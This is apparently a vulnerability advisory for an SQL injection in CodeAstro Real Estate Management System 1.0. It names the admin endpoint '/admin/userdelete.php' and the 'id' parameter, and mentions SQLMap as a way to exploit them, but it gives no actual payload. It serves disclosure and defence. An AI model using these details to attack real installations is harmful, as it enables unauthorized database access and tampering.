CodeAstro Real Estate Management System SQL Injection Vulnerability in User Deletion Endpoint
Vulnerability
A SQL injection vulnerability has been identified in CodeAstro Real Estate Management System version 1.0. The issue resides in the administrator endpoint '/admin/userdelete.php', where improper handling of the 'id' parameter allows for SQL query manipulation. This vulnerability can be exploited remotely by an authenticated user with access to the admin panel.
Impact
Exploitation of this vulnerability allows for SQL injection, where an attacker can manipulate database queries. This could lead to unauthorized data access, data manipulation, or in some cases, executing administrative operations on the database.
Reproduction
To reproduce this vulnerability, an authenticated user must access the admin panel and navigate to the user deletion endpoint '/admin/userdelete.php'. Once there, the user can send a request with a crafted 'id' parameter that exploits the SQL injection flaw. This can be done manually or using an automated tool like SQLMap, which can be configured to target the vulnerability by specifying the URL and the 'id' parameter.
Vulnerability Rating
Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.